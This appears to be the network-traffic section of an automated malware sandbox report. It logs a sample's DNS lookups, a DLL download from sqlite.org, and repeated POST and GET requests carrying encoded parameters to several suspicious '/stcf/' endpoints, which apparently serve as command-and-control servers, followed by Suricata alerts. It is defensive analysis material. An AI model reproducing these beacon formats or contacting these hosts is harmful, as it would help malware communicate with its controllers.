Network Analysis
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.101:49169 | 103.224.182.252:80 | www.saintprojetdesalers.com |
192.168.56.101:49170 | 103.224.182.252:80 | www.saintprojetdesalers.com |
192.168.56.101:49175 | 172.67.172.5:80 | www.admiralx-qjff.buzz |
192.168.56.101:49176 | 172.67.172.5:80 | www.admiralx-qjff.buzz |
192.168.56.101:49173 | 192.187.101.110:80 | www.hummall.com |
192.168.56.101:49174 | 192.187.101.110:80 | www.hummall.com |
192.168.56.101:49171 | 194.58.112.174:80 | www.ronikonmet.online |
192.168.56.101:49172 | 194.58.112.174:80 | www.ronikonmet.online |
192.168.56.101:49177 | 199.21.76.77:80 | www.innovativefewsustra.com |
192.168.56.101:49178 | 199.21.76.77:80 | www.innovativefewsustra.com |
192.168.56.101:49166 | 206.237.167.5:80 | www.houtaijiaju.com |
192.168.56.101:49168 | 206.237.167.5:80 | www.houtaijiaju.com |
192.168.56.101:49167 | 45.33.6.223:80 | www.sqlite.org |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:52815 | 164.124.101.2:53 |
192.168.56.101:53004 | 164.124.101.2:53 |
192.168.56.101:53850 | 164.124.101.2:53 |
192.168.56.101:54148 | 164.124.101.2:53 |
192.168.56.101:54883 | 164.124.101.2:53 |
192.168.56.101:55146 | 164.124.101.2:53 |
192.168.56.101:59002 | 164.124.101.2:53 |
192.168.56.101:61950 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:53853 | 239.255.255.250:1900 |
8.8.8.8:53 | 192.168.56.101:54883 |
POST 0 http://www.houtaijiaju.com/stcf/
REQUEST
POST /stcf/ HTTP/1.1
Host: www.houtaijiaju.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 172
Cache-Control: max-age=0
Origin: http://www.houtaijiaju.com
Referer: http://www.houtaijiaju.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
GET 200 http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
REQUEST
GET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 18 Sep 2023 04:37:03 GMT
Last-Modified: Mon, 15 Nov 2021 22:45:13 GMT
Cache-Control: max-age=120
ETag: "m6192e2f9s87b79"
Content-type: application/zip; charset=utf-8
Content-length: 555897
GET 0 http://www.houtaijiaju.com/stcf/?Pve=1dqEu7FqG0Fk44M2SsORztBhqeVPz5dcffezXnqN6lUv5lMi6TOQp3fd1b+R5p9IBvl5i/IMrCH65j4DnfcQMtwjHinribTwYdLVWxQ=&LSiIl=htN9PL45qap
REQUEST
GET /stcf/?Pve=1dqEu7FqG0Fk44M2SsORztBhqeVPz5dcffezXnqN6lUv5lMi6TOQp3fd1b+R5p9IBvl5i/IMrCH65j4DnfcQMtwjHinribTwYdLVWxQ=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.houtaijiaju.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
POST 302 http://www.saintprojetdesalers.com/stcf/
REQUEST
POST /stcf/ HTTP/1.1
Host: www.saintprojetdesalers.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.saintprojetdesalers.com
Referer: http://www.saintprojetdesalers.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 302 Found
date: Mon, 18 Sep 2023 04:37:14 GMT
server: Apache
set-cookie: __tad=1695011834.2046478; expires=Thu, 15-Sep-2033 04:37:14 GMT; Max-Age=315360000
location: http://ww25.saintprojetdesalers.com/stcf/?subid1=20230918-1437-14cb-aea9-655bbf90f984
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
GET 302 http://www.saintprojetdesalers.com/stcf/?Pve=+e/LxL8BCb5JT2mwgKzbp1bNGh3lgePyU3D6l90SLvlYtUAerZBoaAu+StBCYI+EmdbaVLlpQ9qQs+tY0i0hLe/6ntyVXpS6CIyxXlk=&LSiIl=htN9PL45qap
REQUEST
GET /stcf/?Pve=+e/LxL8BCb5JT2mwgKzbp1bNGh3lgePyU3D6l90SLvlYtUAerZBoaAu+StBCYI+EmdbaVLlpQ9qQs+tY0i0hLe/6ntyVXpS6CIyxXlk=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.saintprojetdesalers.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 302 Found
date: Mon, 18 Sep 2023 04:37:16 GMT
server: Apache
set-cookie: __tad=1695011836.6431378; expires=Thu, 15-Sep-2033 04:37:16 GMT; Max-Age=315360000
location: http://ww25.saintprojetdesalers.com/stcf/?Pve=+e/LxL8BCb5JT2mwgKzbp1bNGh3lgePyU3D6l90SLvlYtUAerZBoaAu+StBCYI+EmdbaVLlpQ9qQs+tY0i0hLe/6ntyVXpS6CIyxXlk=&LSiIl=htN9PL45qap&subid1=20230918-1437-1660-90cc-ced8ecde40f7
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
POST 404 http://www.ronikonmet.online/stcf/
REQUEST
POST /stcf/ HTTP/1.1
Host: www.ronikonmet.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.ronikonmet.online
Referer: http://www.ronikonmet.online/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Sep 2023 04:37:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
GET 404 http://www.ronikonmet.online/stcf/?Pve=uecC1YIjKds5pfO1EToES15TCdBTvi7vIYoUJgTFy6qDYT2nEUgo5MyoghBmj6FTuqUN6uVJE1bE0H4aXubCPUG1zI5pjeamkbBuCmA=&LSiIl=htN9PL45qap
REQUEST
GET /stcf/?Pve=uecC1YIjKds5pfO1EToES15TCdBTvi7vIYoUJgTFy6qDYT2nEUgo5MyoghBmj6FTuqUN6uVJE1bE0H4aXubCPUG1zI5pjeamkbBuCmA=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.ronikonmet.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Sep 2023 04:37:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
POST 404 http://www.hummall.com/stcf/
REQUEST
POST /stcf/ HTTP/1.1
Host: www.hummall.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.hummall.com
Referer: http://www.hummall.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 18 Sep 2023 04:37:31 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://hummall.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET 301 http://www.hummall.com/stcf/?Pve=Nk5K1Xbn5LNktyygdQF3BnmJ+burJ+ny2OkZcNPXdwEtJdOtq79vPWmp/B6BaLcWj3tVzmTo+5PqGZIC/UTM1vSFnsb91g1hVUGRl4c=&LSiIl=htN9PL45qap
REQUEST
GET /stcf/?Pve=Nk5K1Xbn5LNktyygdQF3BnmJ+burJ+ny2OkZcNPXdwEtJdOtq79vPWmp/B6BaLcWj3tVzmTo+5PqGZIC/UTM1vSFnsb91g1hVUGRl4c=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.hummall.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 04:37:34 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://hummall.com/stcf/?Pve=Nk5K1Xbn5LNktyygdQF3BnmJ+burJ+ny2OkZcNPXdwEtJdOtq79vPWmp/B6BaLcWj3tVzmTo+5PqGZIC/UTM1vSFnsb91g1hVUGRl4c=&LSiIl=htN9PL45qap
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST 301 http://www.admiralx-qjff.buzz/stcf/
REQUEST
POST /stcf/ HTTP/1.1
Host: www.admiralx-qjff.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.admiralx-qjff.buzz
Referer: http://www.admiralx-qjff.buzz/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 04:37:39 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __ddg1_=KYXyyg0KpkmtIAtzfhjy; Domain=.admiralx-qjff.buzz; HttpOnly; Path=/; Expires=Tue, 17-Sep-2024 04:37:39 GMT
Location: https://admiralx-memr.buzz/stcf/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AZnUsVto0mXRYEsH1JM0KneNtK4oFJ3uYdXWistjKE6us05lWF1PQQeGRDBC65JARhaTNgLjLkjGScYawxTNWZ2syxqPtCTSdadqCTiSvWzhWgw4CKjPtSsSlX41mEest3f3C6IwQNiL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8086e5191a728d00-KIX
alt-svc: h2=":443"; ma=60
GET 301 http://www.admiralx-qjff.buzz/stcf/?Pve=/cN5NAnYyQNGkv6VI4g5hCl6zLANo+Uxyk0R0Gf4W9JvbRZK1NaF3DJOi9LLfoZAma38Eec3ft5h7udphOb57G+0pUhbPZipWhAdHO0=&LSiIl=htN9PL45qap
REQUEST
GET /stcf/?Pve=/cN5NAnYyQNGkv6VI4g5hCl6zLANo+Uxyk0R0Gf4W9JvbRZK1NaF3DJOi9LLfoZAma38Eec3ft5h7udphOb57G+0pUhbPZipWhAdHO0=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.admiralx-qjff.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 04:37:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __ddg1_=tJNcWBEBROhJsUBunYFj; Domain=.admiralx-qjff.buzz; HttpOnly; Path=/; Expires=Tue, 17-Sep-2024 04:37:42 GMT
Location: https://admiralx-memr.buzz/stcf/?Pve=/cN5NAnYyQNGkv6VI4g5hCl6zLANo+Uxyk0R0Gf4W9JvbRZK1NaF3DJOi9LLfoZAma38Eec3ft5h7udphOb57G+0pUhbPZipWhAdHO0=&LSiIl=htN9PL45qap
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W9P2h50L9iCZtaFsZwjK%2B%2BpbUOdsDr0oCqHSX8bMdqEaFK6aPIbNRH8KOiAMLzLbEAC%2FDR5GkWYwqjWXDjMvghjBEgXUoHn%2Fh2QnBxeil562klGt408%2FA8nhC9UcVK%2Fc4Dh6BbJbyAGK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8086e528ed901a19-KIX
alt-svc: h2=":443"; ma=60
POST 200 http://www.innovativefewsustra.com/stcf/
REQUEST
POST /stcf/ HTTP/1.1
Host: www.innovativefewsustra.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.innovativefewsustra.com
Referer: http://www.innovativefewsustra.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Sep 2023 04:37:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=401766feda9f89c0a84a4662100037c4|175.208.134.152|1695011870|1695011870|0|1|0; path=/; domain=.innovativefewsustra.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=175.208.134.152; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Content-Encoding: gzip
GET 200 http://www.innovativefewsustra.com/stcf/?Pve=KMOD9sTNx2YSpovUrRJUEzn1Yx0Z43DK6JEh/zvUzYRR0vvq/o2vdjVBrU8HPW3QMgYOZkgxf1P3X+8HybL4wtlflHnPghnD15Ngsf8=&LSiIl=htN9PL45qap
REQUEST
GET /stcf/?Pve=KMOD9sTNx2YSpovUrRJUEzn1Yx0Z43DK6JEh/zvUzYRR0vvq/o2vdjVBrU8HPW3QMgYOZkgxf1P3X+8HybL4wtlflHnPghnD15Ngsf8=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.innovativefewsustra.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Sep 2023 04:37:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=f0323ab187659f1d86893d2c16d75572|175.208.134.152|1695011872|1695011872|0|1|0; path=/; domain=.innovativefewsustra.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=175.208.134.152; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49175 -> 172.67.172.5:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 192.168.56.101:49176 -> 172.67.172.5:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 199.21.76.77:80 -> 192.168.56.101:49178 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts